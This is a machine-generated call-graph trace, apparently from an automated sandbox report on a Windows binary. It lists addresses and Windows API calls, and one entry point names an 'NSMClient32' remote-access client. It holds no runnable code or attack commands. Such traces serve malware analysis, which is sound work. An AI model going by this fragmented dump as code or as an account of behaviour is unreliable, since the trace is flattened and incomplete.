__ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 84950->84951 84954 110409c4 84951->84954 84952 11040991 84955 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 84952->84955 84953->84950 84953->84952 84956 110409a7 84955->84956 84958 110fad08 84957->84958 84959 110facf7 84957->84959 84968 110f1f50 9 API calls 84958->84968 84960 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 84959->84960 84962 110fad04 84960->84962 84962->84948 84963 110fad2c 84963->84959 84964 110fad34 84963->84964 84964->84964 84965 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 84964->84965 84966 110fad5a 84965->84966 84966->84948 84967->84947 84968->84963 84969 11089a40 84970 1110f6c0 ___DllMainCRTStartup 4 API calls 84969->84970 84971 11089a53 84970->84971 84972 11089a5d 84971->84972 84981 11089150 268 API calls std::locale::facet::_Facet_Register 84971->84981 84974 11089a84 84972->84974 84982 11089150 268 API calls std::locale::facet::_Facet_Register 84972->84982 84977 11089a93 84974->84977 84978 11089a10 84974->84978 84983 110896a0 84978->84983 84981->84972 84982->84974 85024 11088970 6 API calls ___DllMainCRTStartup 84983->85024 84985 110896d9 GetParent 84986 110896ec 84985->84986 84987 110896fd 84985->84987 84988 110896f0 GetParent 84986->84988 84989 11144dc0 267 API calls 84987->84989 84988->84987 84988->84988 84990 11089709 84989->84990 84991 11163fed std::locale::facet::_Facet_Register 143 API calls 84990->84991 84992 11089716 std::ios_base::_Ios_base_dtor 84991->84992 84993 11144dc0 267 API calls 84992->84993 84994 1108972f 84993->84994 85025 11013830 22 API calls 2 library calls 84994->85025 84996 1108974a 84996->84996 84997 11143230 std::locale::facet::_Facet_Register 8 API calls 84996->84997 85000 1108978a std::ios_base::_Ios_base_dtor 84997->85000 84998 110897a5 84999 11163db7 std::locale::facet::_Facet_Register 102 API calls 84998->84999 85002 110897c3 std::locale::facet::_Facet_Register 84998->85002 84999->85002 85000->84998 85001 11142290 std::locale::facet::_Facet_Register 265 API calls 85000->85001 85001->84998 85004 1102a620 std::locale::facet::_Facet_Register 145 API calls 85002->85004 85015 11089874 std::ios_base::_Ios_base_dtor 85002->85015 85003 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85005 11089962 85003->85005 85006 11089813 85004->85006 85005->84977 85007 11142290 std::locale::facet::_Facet_Register 265 API calls 85006->85007 85008 1108981b 85007->85008 85009 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 85008->85009 85010 11089832 85009->85010 85011 11081bb0 86 API calls 85010->85011 85010->85015 85012 1108984a 85011->85012 85013 1108988e 85012->85013 85014 11089851 85012->85014 85017 11081bb0 86 API calls 85013->85017 85026 110b75d0 85014->85026 85015->85003 85019 11089899 85017->85019 85019->85015 85021 110b75d0 68 API calls 85019->85021 85020 110b75d0 68 API calls 85020->85015 85022 110898a6 85021->85022 85022->85015 85023 110b75d0 68 API calls 85022->85023 85023->85015 85024->84985 85025->84996 85029 110b75b0 85026->85029 85032 111672e3 85029->85032 85035 11167264 85032->85035 85036 11167271 85035->85036 85037 1116728b 85035->85037 85053 11169302 66 API calls __getptd_noexit 85036->85053 85037->85036 85038 11167294 GetFileAttributesA 85037->85038 85040 111672a2 GetLastError 85038->85040 85046 111672b8 85038->85046 85056 11169315 66 API calls 2 library calls 85040->85056 85041 11167276 85054 111692ef 66 API calls __getptd_noexit 85041->85054 85044 11089857 85044->85015 85044->85020 85045 111672ae 85057 111692ef 66 API calls __getptd_noexit 85045->85057 85046->85044 85058 11169302 66 API calls __getptd_noexit 85046->85058 85047 1116727d 85055 1116df04 11 API calls _setlocale 85047->85055 85051 111672cb 85059 111692ef 66 API calls __getptd_noexit 85051->85059 85053->85041 85054->85047 85055->85044 85056->85045 85057->85044 85058->85051 85059->85045 85060 ab1020 GetCommandLineA 85062 ab1035 GetStartupInfoA 85060->85062 85063 ab108b 85062->85063 85064 ab1090 GetModuleHandleA 85062->85064 85063->85064 85067 ab1000 _NSMClient32 85064->85067 85066 ab10a2 ExitProcess 85067->85066 85068 11106100 GetTickCount EnterCriticalSection GetTickCount 85069 11106153 85068->85069 85070 11106148 85068->85070 85072 11106172 85069->85072 85073 111061ca GetTickCount LeaveCriticalSection 85069->85073 85071 11146450 std::locale::facet::_Facet_Register 21 API calls 85070->85071 85071->85069 85076 11106190 GetTickCount LeaveCriticalSection 85072->85076 85105 11029450 265 API calls 2 library calls 85072->85105 85074 111061f0 EnterCriticalSection 85073->85074 85075 111061e2 85073->85075 85078 11106219 85074->85078 85077 11146450 std::locale::facet::_Facet_Register 21 API calls 85075->85077 85080 111061b3 85076->85080 85081 111061a8 85076->85081 85082 111061ed 85077->85082 85085 11106223 85078->85085 85086 11106244 85078->85086 85084 11146450 std::locale::facet::_Facet_Register 21 API calls 85081->85084 85082->85074 85084->85080 85087 111062be LeaveCriticalSection 85085->85087 85088 1110622e 85085->85088 85089 1110f420 std::locale::facet::_Facet_Register 265 API calls 85086->85089 85106 11029450 265 API calls 2 library calls 85088->85106 85091 1110624e 85089->85091 85097 11106267 85091->85097 85107 110f0cf0 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 85091->85107 85093 111062bb 85093->85087 85095 11106274 85108 11029450 265 API calls 2 library calls 85095->85108 85096 1110628b 85109 110ebfb0 268 API calls 4 library calls 85096->85109 85097->85095 85097->85096 85101 111062a0 85110 11148f50 67 API calls std::ios_base::_Ios_base_dtor 85101->85110 85103 111062af 85104 11146450 std::locale::facet::_Facet_Register 21 API calls 85103->85104 85104->85093 85107->85097 85109->85101 85110->85103 85111 110173f0 GetTickCount 85118 11017300 85111->85118 85116 11146450 std::locale::facet::_Facet_Register 21 API calls 85117 11017437 85116->85117 85119 11017320 85118->85119 85126 110173d6 85118->85126 85121 11017342 CoInitialize _GetRawWMIStringW 85119->85121 85122 11017339 WaitForSingleObject 85119->85122 85120 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85124 110173e5 85120->85124 85123 110173c2 85121->85123 85130 11017375 85121->85130 85122->85121 85125 110173d0 CoUninitialize 85123->85125 85123->85126 85131 11017220 85124->85131 85125->85126 85126->85120 85127 110173bc 85144 11163837 67 API calls __fassign 85127->85144 85129 11163a2d __hextodec 79 API calls 85129->85130 85130->85123 85130->85127 85130->85129 85132 11017240 85131->85132 85133 110172e6 85131->85133 85134 11017258 CoInitialize _GetRawWMIStringW 85132->85134 85136 1101724f WaitForSingleObject 85132->85136 85135 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85133->85135 85137 110172d2 85134->85137 85140 1101728b 85134->85140 85138 110172f5 SetEvent GetTickCount 85135->85138 85136->85134 85137->85133 85139 110172e0 CoUninitialize 85137->85139 85138->85116 85139->85133 85140->85137 85141 110172cc 85140->85141 85143 11163a2d __hextodec 79 API calls 85140->85143 85145 11163837 67 API calls __fassign 85141->85145 85143->85140 85144->85123 85145->85137 85146 11025cd0 LoadLibraryA 85147 1113cd60 85148 1113cd69 85147->85148 85149 1113cd6e 85147->85149 85151 11139090 85148->85151 85152 111390d2 85151->85152 85153 111390c7 GetCurrentThreadId 85151->85153 85154 111390e0 85152->85154 85285 11029330 85152->85285 85153->85152 85292 11133920 85154->85292 85160 111391d1 85164 11139202 FindWindowA 85160->85164 85170 1113929a 85160->85170 85161 1113975a 85162 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85161->85162 85165 11139772 85162->85165 85167 11139217 IsWindowVisible 85164->85167 85164->85170 85165->85149 85166 1113911c IsWindow IsWindowVisible 85168 11146450 std::locale::facet::_Facet_Register 21 API calls 85166->85168 85169 1113921e 85167->85169 85167->85170 85171 11139147 85168->85171 85169->85170 85177 11138c30 392 API calls 85169->85177 85172 1105dd10 79 API calls 85170->85172 85183 111392bf 85170->85183 85174 1105dd10 79 API calls 85171->85174 85197 111392e7 85172->85197 85173 11139470 85176 1113948a 85173->85176 85180 11138c30 392 API calls 85173->85180 85175 11139163 IsWindowVisible 85174->85175 85175->85160 85179 11139171 85175->85179 85182 111394a7 85176->85182 85528 1106b860 298 API calls 85176->85528 85181 1113923f IsWindowVisible 85177->85181 85178 1105dd10 79 API calls 85184 1113945f 85178->85184 85179->85160 85185 11139179 85179->85185 85180->85176 85181->85170 85186 1113924e IsIconic 85181->85186 85529 1112ce90 12 API calls 2 library calls 85182->85529 85183->85173 85183->85178 85184->85173 85189 11139464 85184->85189 85190 11146450 std::locale::facet::_Facet_Register 21 API calls 85185->85190 85186->85170 85191 1113925f GetForegroundWindow 85186->85191 85527 1102cff0 294 API calls std::locale::facet::_Facet_Register 85189->85527 85195 11139183 GetForegroundWindow 85190->85195 85525 11131210 147 API calls 85191->85525 85192 111394ac 85199 111394b4 85192->85199 85200 111394bd 85192->85200 85194 1113946b 85194->85173 85204 11139192 EnableWindow 85195->85204 85205 111391be 85195->85205 85197->85183 85198 11139334 85197->85198 85207 11081a70 IsDBCSLeadByte 85197->85207 85201 11143230 std::locale::facet::_Facet_Register 8 API calls 85198->85201 85530 11131b00 89 API calls 3 library calls 85199->85530 85202 111394d4 85200->85202 85203 111394c8 85200->85203 85209 11139346 85201->85209 85532 111317a0 299 API calls std::locale::facet::_Facet_Register 85202->85532 85210 111394d9 85203->85210 85531 11131870 299 API calls std::locale::facet::_Facet_Register 85203->85531 85523 11131210 147 API calls 85204->85523 85205->85160 85219 111391ca SetForegroundWindow 85205->85219 85206 1113926e 85526 11131210 147 API calls 85206->85526 85207->85198 85215 11139353 GetLastError 85209->85215 85222 11139361 85209->85222 85217 111395e9 85210->85217 85221 111394d2 85210->85221 85214 111394ba 85214->85200 85220 11146450 std::locale::facet::_Facet_Register 21 API calls 85215->85220 85226 111386b0 295 API calls 85217->85226 85218 111391a9 85524 11131210 147 API calls 85218->85524 85219->85160 85220->85222 85221->85210 85223 111394f1 85221->85223 85224 1113959b 85221->85224 85222->85183 85234 111393b2 85222->85234 85237 11081a70 IsDBCSLeadByte 85222->85237 85223->85217 85235 1110f420 std::locale::facet::_Facet_Register 265 API calls 85223->85235 85224->85217 85540 1103f000 68 API calls 85224->85540 85240 111395ee 85226->85240 85227 1113928b EnableWindow 85227->85170 85228 11139275 85228->85227 85230 11139284 SetForegroundWindow 85228->85230 85229 111391b0 EnableWindow 85229->85205 85230->85227 85232 11139615 85242 1105dd10 79 API calls 85232->85242 85284 1113973a std::ios_base::_Ios_base_dtor 85232->85284 85233 111395aa 85541 1103f040 68 API calls 85233->85541 85239 11143230 std::locale::facet::_Facet_Register 8 API calls 85234->85239 85238 11139512 85235->85238 85237->85234 85243 11139533 85238->85243 85533 110573b0 306 API calls std::locale::facet::_Facet_Register 85238->85533 85244 111393c4 85239->85244 85240->85232 85439 11142210 85240->85439 85241 111395b5 85542 1103f060 68 API calls 85241->85542 85258 11139645 85242->85258 85534 1110f260 InterlockedIncrement 85243->85534 85244->85183 85245 111393cb GetLastError 85244->85245 85249 11146450 std::locale::facet::_Facet_Register 21 API calls 85245->85249 85249->85183 85251 111395c0 85543 1103f020 68 API calls 85251->85543 85252 11139558 85535 1104ce00 746 API calls 85252->85535 85255 111395cb 85544 1110f270 InterlockedDecrement 85255->85544 85256 11139563 85536 1104e340 746 API calls 85256->85536 85259 1113968d 85258->85259 85260 11139699 GetTickCount 85258->85260 85263 1113966a 85258->85263 85258->85284 85259->85260 85259->85284 85264 111396ab 85260->85264 85260->85284 85262 11139599 85262->85217 85266 11146450 std::locale::facet::_Facet_Register 21 API calls 85263->85266 85267 11142e80 145 API calls 85264->85267 85265 1113956e 85537 1104e3b0 746 API calls 85265->85537 85269 11139675 GetTickCount 85266->85269 85270 111396b7 85267->85270 85269->85284 85272 11146ee0 269 API calls 85270->85272 85271 11139579 85538 1104ce40 746 API calls 85271->85538 85274 111396c2 85272->85274 85276 11142e80 145 API calls 85274->85276 85275 11139584 85275->85217 85539 110ebf30 285 API calls 85275->85539 85277 111396d5 85276->85277 85545 11025bb0 LoadLibraryA 85277->85545 85280 111396e2 85280->85280 85546 1112c7a0 GetProcAddress SetLastError 85280->85546 85282 11139729 85283 11139733 FreeLibrary 85282->85283 85282->85284 85283->85284 85284->85161 85547 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 85285->85547 85287 1102933e 85288 11029353 85287->85288 85548 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 85287->85548 85549 11089cc0 269 API calls 2 library calls 85288->85549 85291 1102935e 85291->85154 85293 11133962 85292->85293 85294 11133c84 85292->85294 85296 1105dd10 79 API calls 85293->85296 85295 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85294->85295 85298 11133c9c 85295->85298 85297 11133982 85296->85297 85297->85294 85299 1113398a GetLocalTime 85297->85299 85340 11133400 85298->85340 85300 111339c1 LoadLibraryA 85299->85300 85301 111339a0 85299->85301 85550 110098c0 LoadLibraryA 85300->85550 85302 11146450 std::locale::facet::_Facet_Register 21 API calls 85301->85302 85304 111339b5 85302->85304 85304->85300 85305 11133a15 85551 11015c30 LoadLibraryA 85305->85551 85307 11133a20 GetCurrentProcess 85308 11133a45 GetProcAddress 85307->85308 85309 11133a5d GetProcessHandleCount 85307->85309 85308->85309 85310 11133a66 SetLastError 85308->85310 85311 11133a6e 85309->85311 85310->85311 85312 11133a92 85311->85312 85313 11133a78 GetProcAddress 85311->85313 85315 11133aa0 GetProcAddress 85312->85315 85316 11133aba 85312->85316 85313->85312 85314 11133ac7 SetLastError 85313->85314 85314->85315 85315->85316 85317 11133ad4 SetLastError 85315->85317 85318 11133adf GetProcAddress 85316->85318 85317->85318 85319 11133af1 K32GetProcessMemoryInfo 85318->85319 85320 11133aff SetLastError 85318->85320 85321 11133b07 85319->85321 85320->85321 85322 11146450 std::locale::facet::_Facet_Register 21 API calls 85321->85322 85326 11133b7d 85321->85326 85322->85326 85323 11133c5a 85324 11133c6a FreeLibrary 85323->85324 85325 11133c6d 85323->85325 85324->85325 85327 11133c77 FreeLibrary 85325->85327 85328 11133c7a 85325->85328 85326->85323 85330 1105dd10 79 API calls 85326->85330 85327->85328 85328->85294 85329 11133c81 FreeLibrary 85328->85329 85329->85294 85331 11133bce 85330->85331 85332 1105dd10 79 API calls 85331->85332 85333 11133bf6 85332->85333 85334 1105dd10 79 API calls 85333->85334 85335 11133c1d 85334->85335 85336 1105dd10 79 API calls 85335->85336 85337 11133c44 85336->85337 85337->85323 85338 11133c55 85337->85338 85552 11027780 265 API calls 2 library calls 85338->85552 85342 1113342d 85340->85342 85341 111338e9 85341->85160 85341->85161 85443 11138c30 85341->85443 85342->85341 85343 110d1550 268 API calls 85342->85343 85344 1113348e 85343->85344 85345 110d1550 268 API calls 85344->85345 85346 11133499 85345->85346 85347 111334c7 85346->85347 85348 111334de 85346->85348 85553 11029450 265 API calls 2 library calls 85347->85553 85350 11146450 std::locale::facet::_Facet_Register 21 API calls 85348->85350 85352 111334ec 85350->85352 85554 110d12e0 265 API calls 85352->85554 85440 1114222f 85439->85440 85441 1114221a 85439->85441 85440->85232 85555 11141890 85441->85555 85444 1113906f 85443->85444 85447 11138c4d 85443->85447 85445 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85444->85445 85446 1113907e 85445->85446 85446->85166 85447->85444 85448 111450a0 std::locale::facet::_Facet_Register 90 API calls 85447->85448 85449 11138c8c 85448->85449 85449->85444 85450 1105dd10 79 API calls 85449->85450 85451 11138cbb 85450->85451 85691 1112c920 85451->85691 85453 11138e00 PostMessageA 85455 11138e15 85453->85455 85454 1105dd10 79 API calls 85456 11138dfc 85454->85456 85457 11138e25 85455->85457 85700 1110f270 InterlockedDecrement 85455->85700 85456->85453 85456->85455 85459 11138e2b 85457->85459 85460 11138e4d 85457->85460 85463 11138e83 std::ios_base::_Ios_base_dtor 85459->85463 85464 11138e9e 85459->85464 85701 11130410 315 API calls std::locale::facet::_Facet_Register 85460->85701 85462 11138e55 85702 11146ec0 267 API calls 85462->85702 85470 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85463->85470 85465 11142e80 145 API calls 85464->85465 85468 11138ea3 85465->85468 85471 11146ee0 269 API calls 85468->85471 85469 11138e5f 85703 1112cb20 SetDlgItemTextA 85469->85703 85473 11138e9a 85470->85473 85474 11138eaa SetWindowTextA 85471->85474 85473->85166 85476 11138ec6 85474->85476 85480 11138ecd std::ios_base::_Ios_base_dtor 85474->85480 85475 11138e70 std::ios_base::_Ios_base_dtor 85475->85459 85704 111352b0 299 API calls 5 library calls 85476->85704 85477 11145b40 271 API calls 85479 11138dab 85477->85479 85479->85453 85479->85454 85481 11138f24 85480->85481 85482 11138ef7 85480->85482 85705 111352b0 299 API calls 5 library calls 85480->85705 85483 11138f38 85481->85483 85484 11138ffc 85481->85484 85482->85481 85487 11138f0c 85482->85487 85488 11138f5c 85483->85488 85707 111352b0 299 API calls 5 library calls 85483->85707 85486 1113901d 85484->85486 85491 1113900b 85484->85491 85492 11139004 85484->85492 85713 110f8640 86 API calls 85486->85713 85706 11131210 147 API calls 85487->85706 85709 110f8640 86 API calls 85488->85709 85712 11131210 147 API calls 85491->85712 85711 111352b0 299 API calls 5 library calls 85492->85711 85494 11138f67 85494->85444 85500 11138f6f IsWindowVisible 85494->85500 85496 11138f1c 85496->85481 85498 11139028 85498->85444 85502 1113902c IsWindowVisible 85498->85502 85500->85444 85504 11138f86 85500->85504 85501 1113901a 85501->85486 85502->85444 85505 1113903e IsWindowVisible 85502->85505 85503 11138f46 85503->85488 85506 11138f52 85503->85506 85507 111450a0 std::locale::facet::_Facet_Register 90 API calls 85504->85507 85505->85444 85508 1113904b EnableWindow 85505->85508 85708 11131210 147 API calls 85506->85708 85512 11138f91 85507->85512 85714 11131210 147 API calls 85508->85714 85511 11138f59 85511->85488 85512->85444 85514 11138f9c GetForegroundWindow IsWindowVisible 85512->85514 85513 11139062 EnableWindow 85513->85444 85515 11138fc1 85514->85515 85516 11138fb6 EnableWindow 85514->85516 85710 11131210 147 API calls 85515->85710 85516->85515 85518 11138fc8 85519 11138fde EnableWindow 85518->85519 85521 11138fd7 SetForegroundWindow 85518->85521 85520 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85519->85520 85522 11138ff8 85520->85522 85521->85519 85522->85166 85523->85218 85524->85229 85525->85206 85526->85228 85527->85194 85528->85182 85529->85192 85530->85214 85531->85221 85532->85210 85533->85243 85534->85252 85535->85256 85536->85265 85537->85271 85538->85275 85539->85262 85540->85233 85541->85241 85542->85251 85543->85255 85544->85262 85545->85280 85546->85282 85547->85287 85548->85287 85549->85291 85550->85305 85551->85307 85552->85323 85556 111418cf 85555->85556 85607 111418c8 std::ios_base::_Ios_base_dtor 85555->85607 85557 1110f420 std::locale::facet::_Facet_Register 265 API calls 85556->85557 85559 111418d6 85557->85559 85558 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85560 1114220a 85558->85560 85561 11141906 85559->85561 85682 11060f70 301 API calls std::locale::facet::_Facet_Register 85559->85682 85560->85440 85563 11061700 275 API calls 85561->85563 85564 11141942 85563->85564 85565 11141949 RegCloseKey 85564->85565 85566 11141950 std::locale::facet::_Facet_Register 85564->85566 85565->85566 85567 11144dc0 267 API calls 85566->85567 85568 1114196c 85567->85568 85569 11143230 std::locale::facet::_Facet_Register 8 API calls 85568->85569 85570 11141980 85569->85570 85571 11141997 85570->85571 85572 11062d60 330 API calls 85570->85572 85573 1110f420 std::locale::facet::_Facet_Register 265 API calls 85571->85573 85572->85571 85574 1114199e 85573->85574 85575 111419ba 85574->85575 85683 11060be0 293 API calls std::locale::facet::_Facet_Register 85574->85683 85577 1110f420 std::locale::facet::_Facet_Register 265 API calls 85575->85577 85578 111419d3 85577->85578 85579 111419ef 85578->85579 85684 11060be0 293 API calls std::locale::facet::_Facet_Register 85578->85684 85581 1110f420 std::locale::facet::_Facet_Register 265 API calls 85579->85581 85582 11141a08 85581->85582 85583 11141a24 85582->85583 85685 11060be0 293 API calls std::locale::facet::_Facet_Register 85582->85685 85585 11060760 268 API calls 85583->85585 85586 11141a4d 85585->85586 85587 11060760 268 API calls 85586->85587 85625 11141a67 85587->85625 85588 11141d95 85589 110d1550 268 API calls 85588->85589 85592 11142179 85588->85592 85591 11141db3 85589->85591 85590 110607f0 274 API calls 85590->85625 85595 1105dd10 79 API calls 85591->85595 85598 11060640 69 API calls 85592->85598 85593 11141d85 85594 11146450 std::locale::facet::_Facet_Register 21 API calls 85593->85594 85594->85588 85597 11141df0 85595->85597 85596 11146450 21 API calls std::locale::facet::_Facet_Register 85596->85625 85599 11141f3d 85597->85599 85602 11060760 268 API calls 85597->85602 85600 111421d2 85598->85600 85601 11060f40 274 API calls 85599->85601 85603 11060640 69 API calls 85600->85603 85604 11141f59 85601->85604 85606 11141e0e 85602->85606 85603->85607 85686 110679c0 298 API calls std::locale::facet::_Facet_Register 85604->85686 85605 111319f0 86 API calls 85605->85625 85608 110607f0 274 API calls 85606->85608 85607->85558 85614 11141e1d 85608->85614 85610 11141e52 85612 11060760 268 API calls 85610->85612 85611 11146450 std::locale::facet::_Facet_Register 21 API calls 85611->85614 85615 11141e68 85612->85615 85613 11141f83 85616 11141fb3 EnterCriticalSection 85613->85616 85627 11141f87 85613->85627 85614->85610 85614->85611 85618 110607f0 274 API calls 85614->85618 85619 110607f0 274 API calls 85615->85619 85617 11060420 271 API calls 85616->85617 85620 11141fd0 85617->85620 85618->85614 85637 11141e78 85619->85637 85624 11060f40 274 API calls 85620->85624 85621 11081c60 86 API calls std::locale::facet::_Facet_Register 85621->85625 85623 11081bb0 86 API calls 85623->85625 85629 11141fe6 85624->85629 85625->85588 85625->85590 85625->85593 85625->85596 85625->85605 85625->85621 85625->85623 85626 11141eb1 85628 11060760 268 API calls 85626->85628 85627->85616 85687 110508e0 365 API calls 4 library calls 85627->85687 85688 110679c0 298 API calls std::locale::facet::_Facet_Register 85627->85688 85630 11141ec7 85628->85630 85631 11141ffa LeaveCriticalSection 85629->85631 85634 1102a9f0 283 API calls 85629->85634 85633 110607f0 274 API calls 85630->85633 85635 1114204e 85631->85635 85636 1114200e 85631->85636 85632 11146450 std::locale::facet::_Facet_Register 21 API calls 85632->85637 85652 11141ed6 85633->85652 85639 11141ff7 85634->85639 85640 11133400 273 API calls 85635->85640 85636->85635 85644 11146450 std::locale::facet::_Facet_Register 21 API calls 85636->85644 85637->85626 85637->85632 85641 110607f0 274 API calls 85637->85641 85639->85631 85643 11142058 85640->85643 85641->85637 85642 11141f11 85646 11060640 69 API calls 85642->85646 85645 110d1550 268 API calls 85643->85645 85647 1114201c 85644->85647 85649 11142066 85645->85649 85650 11141f1f 85646->85650 85651 1113cc30 311 API calls 85647->85651 85648 11146450 std::locale::facet::_Facet_Register 21 API calls 85648->85652 85689 110cff20 265 API calls std::locale::facet::_Facet_Register 85649->85689 85653 11060640 69 API calls 85650->85653 85654 11142021 85651->85654 85652->85642 85652->85648 85655 110607f0 274 API calls 85652->85655 85656 11141f2e 85653->85656 85657 111414a0 1447 API calls 85654->85657 85655->85652 85660 11060640 69 API calls 85656->85660 85658 11142027 85657->85658 85658->85635 85662 11146450 std::locale::facet::_Facet_Register 21 API calls 85658->85662 85660->85599 85661 1114209c 85676 1114211f 85661->85676 85690 110d12e0 265 API calls 85661->85690 85664 11142040 85662->85664 85667 11026ba0 701 API calls 85664->85667 85665 110d07c0 265 API calls 85668 1114215b 85665->85668 85667->85635 85671 110d07c0 265 API calls 85668->85671 85671->85592 85676->85665 85682->85561 85683->85575 85684->85579 85685->85583 85686->85613 85687->85627 85688->85627 85689->85661 85692 1112c93c 85691->85692 85693 1112c977 85692->85693 85694 1112c964 85692->85694 85715 1106b860 298 API calls 85693->85715 85696 11146ee0 269 API calls 85694->85696 85697 1112c96f 85696->85697 85698 11142290 std::locale::facet::_Facet_Register 265 API calls 85697->85698 85699 1112c9c3 85697->85699 85698->85699 85699->85477 85699->85479 85700->85457 85701->85462 85702->85469 85703->85475 85704->85480 85705->85482 85706->85496 85707->85503 85708->85511 85709->85494 85710->85518 85711->85491 85712->85501 85713->85498 85714->85513 85715->85697 85716 11144200 85717 11144211 85716->85717 85731 11143c20 85717->85731 85721 11144295 85724 111442b2 85721->85724 85726 111442a4 85721->85726 85722 1114425b 85723 11144262 ResetEvent 85722->85723 85739 11143de0 265 API calls 2 library calls 85723->85739 85740 11143de0 265 API calls 2 library calls 85726->85740 85727 11144276 SetEvent WaitForMultipleObjects 85727->85723 85729 11144294 85727->85729 85729->85721 85730 111442af 85730->85724 85732 11143c2c GetCurrentProcess 85731->85732 85733 11143c4f 85731->85733 85732->85733 85734 11143c3d GetModuleFileNameA 85732->85734 85735 1110f420 std::locale::facet::_Facet_Register 263 API calls 85733->85735 85737 11143c79 WaitForMultipleObjects 85733->85737 85734->85733 85736 11143c6b 85735->85736 85736->85737 85741 11143570 GetModuleFileNameA 85736->85741 85737->85721 85737->85722 85739->85727 85740->85730 85742 111435f3 85741->85742 85743 111435b3 85741->85743 85746 111435ff LoadLibraryA 85742->85746 85747 11143619 GetModuleHandleA GetProcAddress 85742->85747 85744 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 85743->85744 85745 111435c1 85744->85745 85745->85742 85751 111435c8 LoadLibraryA 85745->85751 85746->85747 85748 1114360e LoadLibraryA 85746->85748 85749 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85747->85749 85750 11143639 85747->85750 85748->85747 85752 11143673 10 API calls 85749->85752 85750->85752 85751->85742 85753 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85752->85753 85754 111436f0 85753->85754 85754->85737 85755 1115bde0 85756 1115bdf4 85755->85756 85757 1115bdec 85755->85757 85767 111631ab 85756->85767 85760 1115be14 85761 1115bf40 85763 11162be5 _free 66 API calls 85761->85763 85764 1115bf68 85763->85764 85765 1115be31 85765->85761 85766 1115bf24 SetLastError 85765->85766 85766->85765 85768 11170166 __calloc_crt 66 API calls 85767->85768 85769 111631c5 85768->85769 85773 1115be08 85769->85773 85791 111692ef 66 API calls __getptd_noexit 85769->85791 85771 111631d8 85771->85773 85792 111692ef 66 API calls __getptd_noexit 85771->85792 85773->85760 85773->85761 85774 1115ba20 CoInitializeSecurity CoCreateInstance 85773->85774 85775 1115ba95 wsprintfW SysAllocString 85774->85775 85776 1115bc14 85774->85776 85781 1115badb 85775->85781 85777 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85776->85777 85779 1115bc40 85777->85779 85778 1115bc01 SysFreeString 85778->85776 85779->85765 85780 1115bbe9 85780->85778 85781->85778 85781->85780 85781->85781 85782 1115bb6c 85781->85782 85783 1115bb5a wsprintfW 85781->85783 85793 110974a0 85782->85793 85783->85782 85785 1115bb7e 85786 110974a0 266 API calls 85785->85786 85787 1115bb93 85786->85787 85798 11097550 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 85787->85798 85789 1115bbd7 85799 11097550 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 85789->85799 85791->85771 85792->85773 85794 1110f420 std::locale::facet::_Facet_Register 265 API calls 85793->85794 85795 110974d3 85794->85795 85796 110974e6 SysAllocString 85795->85796 85797 11097504 85795->85797 85796->85797 85797->85785 85798->85789 85799->85780 85800 6d1e5ae6 85801 6d1e5af6 85800->85801 85802 6d1e5af1 ___security_init_cookie 85800->85802 85805 6d1e59f0 85801->85805 85802->85801 85804 6d1e5b04 85806 6d1e59fc 85805->85806 85808 6d1e5a99 85806->85808 85810 6d1e5a49 85806->85810 85813 6d1e588c 85806->85813 85808->85804 85809 6d1e588c __CRT_INIT@12 59 API calls 85809->85808 85810->85808 85811 6d1e588c __CRT_INIT@12 59 API calls 85810->85811 85812 6d1e5a79 85810->85812 85811->85812 85812->85808 85812->85809 85814 6d1e5898 85813->85814 85815 6d1e591a 85814->85815 85816 6d1e58a0 85814->85816 85818 6d1e597b 85815->85818 85819 6d1e5920 85815->85819 85855 6d1e607f HeapCreate 85816->85855 85821 6d1e59d9 85818->85821 85822 6d1e5980 85818->85822 85823 6d1e58a9 85819->85823 85824 6d1e593e 85819->85824 85862 6d1e5e35 10 API calls _doexit 85819->85862 85820 6d1e58a5 85820->85823 85833 6d1e58c0 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA 85820->85833 85821->85823 85825 6d1e59de __freeptd 85821->85825 85866 6d1e6da9 TlsGetValue DecodePointer TlsSetValue 85822->85866 85823->85810 85839 6d1e594d 85824->85839 85863 6d1e9b09 DeleteCriticalSection _free 85824->85863 85825->85823 85828 6d1e5985 __calloc_crt 85828->85823 85829 6d1e599d DecodePointer 85828->85829 85834 6d1e59b2 85829->85834 